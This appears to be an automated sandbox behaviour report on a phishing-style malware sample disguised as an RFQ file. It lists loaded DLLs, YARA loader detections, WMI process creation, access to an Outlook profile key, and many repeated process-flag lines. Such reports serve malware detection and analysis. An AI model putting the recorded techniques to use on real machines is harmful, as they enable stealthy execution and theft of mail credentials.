Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Section loaded: dpapi.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2046638246.0000000009DB1000.00000004.00000800.00020000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.00000000070D6000.00000004.00000800.00020000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2038788534.0000000007B90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2046638246.0000000009DB1000.00000004.00000800.00020000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.00000000070D6000.00000004.00000800.00020000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2038788534.0000000007B90000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: powershell.pdbUGP source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000000.1751510108.0000000000011000.00000020.00000001.01000000.00000005.sdmp, RFQ_43200046412000086500125.vbs.exe.1.dr
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2045039920.0000000009990000.00000004.08000000.00040000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: powershell.pdb source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000000.1751510108.0000000000011000.00000020.00000001.01000000.00000005.sdmp, RFQ_43200046412000086500125.vbs.exe.1.dr
Source:	Binary string: protobuf-net.pdb source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2045039920.0000000009990000.00000004.08000000.00040000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmp

Data Obfuscation

Yara detected Costura Assembly Loader

Source: Yara match	File source: 8.2.InstallUtil.exe.4cb0000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RFQ_43200046412000086500125.vbs.exe.9b70000.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RFQ_43200046412000086500125.vbs.exe.6c521f0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RFQ_43200046412000086500125.vbs.exe.9b70000.17.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RFQ_43200046412000086500125.vbs.exe.6dfde30.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RFQ_43200046412000086500125.vbs.exe.6dfde30.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RFQ_43200046412000086500125.vbs.exe.6b01dd0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RFQ_43200046412000086500125.vbs.exe.67f9d60.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2076310345.0000000004CB0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2045997781.0000000009B70000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2011025718.0000000005606000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2063750110.0000000002541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2024331201.00000000067F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RFQ_43200046412000086500125.vbs.exe PID: 7728, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 8184, type: MEMORYSTR

Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_051826BF push eax; ret	3_2_051826D9
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_0518A8F9 push es; ret	3_2_0518A91C
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_0518D347 push edx; retf	3_2_0518D379
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_0518D37B push edx; retf	3_2_0518D379
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_074AB4FA pushfd ; retf	3_2_074AB4FB
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_07CA0CF8 push cs; retf 0007h	3_2_07CA0ED6
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_07CA5348 push ebx; retf 0007h	3_2_07CA53FE
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_07CA5F49 pushad ; retf 0007h	3_2_07CA600E
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_07CA5341 push ebx; retf 0007h	3_2_07CA53FE
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_07CA5F50 pushad ; retf 0007h	3_2_07CA600E
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_07CA4F38 push eax; retf 0007h	3_2_07CA500E
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_07CA4F30 push eax; retf 0007h	3_2_07CA500E
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_07CA52D9 push ebx; retf 0007h	3_2_07CA5336
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_07CA52E0 push ebx; retf 0007h	3_2_07CA5336
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_07CA5278 push edx; retf 0007h	3_2_07CA52CE
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_07CA5270 push edx; retf 0007h	3_2_07CA52CE
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_07CA1C70 push ds; retf 0007h	3_2_07CA1E36
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_0987C0C6 pushfd ; retf	3_2_0987C0C7
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_09876DFD pushfd ; retf	3_2_09876DFE
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_0987E43F pushfd ; retf	3_2_0987E440
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_099333CE push 8B044389h; ret	3_2_099333D8
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_0993331B push 8B044388h; ret	3_2_09933320
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_09A2B924 push ecx; ret	3_2_09A2B925
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_09D951C8 push E8FFFFF8h; iretd	3_2_09D951CD
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_09D96D72 push eax; ret	3_2_09D96D75
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_09D91538 pushad ; iretd	3_2_09D91539
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_09D923BB pushad ; iretd	3_2_09D923BC
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_09D932FD pushad ; iretd	3_2_09D932FE
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Code function: 3_2_09D9428D pushad ; iretd	3_2_09D9428E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_0099190D push cs; ret	8_2_00991911
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 8_2_00994BEB push es; retf	8_2_00994BF7

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create

Source: C:\Windows\System32\cmd.exe

File created: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe

Jump to dropped file

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\InstallUtil.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
